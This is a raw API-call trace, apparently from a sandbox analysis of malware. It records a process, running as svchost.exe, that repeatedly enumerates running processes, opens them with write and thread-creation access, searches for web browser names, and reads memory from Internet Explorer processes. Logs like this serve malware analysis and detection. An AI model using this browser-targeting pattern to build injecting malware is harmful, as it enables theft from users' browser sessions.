	[0231.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.425] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0231.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.425] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.426] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0231.439] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x6aac
	[0231.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.439] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0231.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.439] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.439] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0231.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.440] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.440] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0231.440] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x6ab0
	[0231.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.441] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0231.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.441] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.442] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0231.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.442] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.443] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0231.443] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x6ab4
	[0231.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.443] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0231.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.444] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.444] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0231.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.445] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.445] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0231.446] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x6ab8
	[0231.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.446] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0231.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.446] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.447] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0231.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.447] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.447] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0231.448] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x6abc
	[0231.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.448] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0231.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.448] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.448] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0231.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.449] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.449] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0231.450] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x6ac0
	[0231.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.450] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0231.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.450] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.451] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0231.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.451] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.451] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0231.452] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x6ac4
	[0231.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.452] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0231.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.453] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.454] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0231.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.454] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.455] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0231.455] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x6ac8
	[0231.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.455] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0231.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.456] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.456] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0231.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.457] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.457] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0231.458] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x6acc
	[0231.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.458] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0231.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.459] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.460] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0231.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.460] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.461] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0231.462] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x6ad0
	[0231.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.462] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0231.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.462] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.463] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0231.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.463] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.464] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0231.464] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x6ad4
	[0231.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.464] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0231.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.465] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0231.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.465] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0231.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.465] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.466] NtQueryInformationProcess (in: ProcessHandle=0x6ad4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0231.466] ReadProcessMemory (in: hProcess=0x6ad4, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0231.466] ReadProcessMemory (in: hProcess=0x6ad4, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0231.466] ReadProcessMemory (in: hProcess=0x6ad4, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0231.466] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0231.466] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0231.467] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x6ad8
	[0231.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.467] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0231.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.467] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0231.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.468] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0231.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.468] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.468] NtQueryInformationProcess (in: ProcessHandle=0x6ad8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0231.468] ReadProcessMemory (in: hProcess=0x6ad8, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0231.468] ReadProcessMemory (in: hProcess=0x6ad8, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0231.468] ReadProcessMemory (in: hProcess=0x6ad8, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0231.468] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0231.469] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0231.469] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x6adc
	[0231.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.470] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0231.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.470] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.470] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0231.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.470] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.471] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0231.471] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x6ae0
	[0231.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.472] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0231.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.472] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.472] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0231.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.473] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.473] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.474] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x6ae4
	[0231.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.474] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.474] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.474] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.475] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.475] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.476] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.476] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x6ae8
	[0231.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.477] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.477] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.477] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.478] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.478] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.478] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x6aec
	[0231.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.479] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.479] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.479] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.479] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.480] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0231.480] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x6af0
	[0231.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.481] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0231.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.481] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.481] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0231.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.482] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.482] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0231.482] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x6af4
	[0231.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.483] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.483] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.483] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.484] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.484] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.484] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x6af8
	[0231.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.485] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.485] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.485] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.486] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.486] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.486] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x6afc
	[0231.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.487] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.487] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.487] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.488] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.488] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0231.489] CloseHandle (hObject=0x4fd0) returned 1
	[0231.489] Sleep (dwMilliseconds=0x64) 
	[0231.583] GetCurrentProcessId () returned 0x110
	[0231.583] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0231.586] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0231.587] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
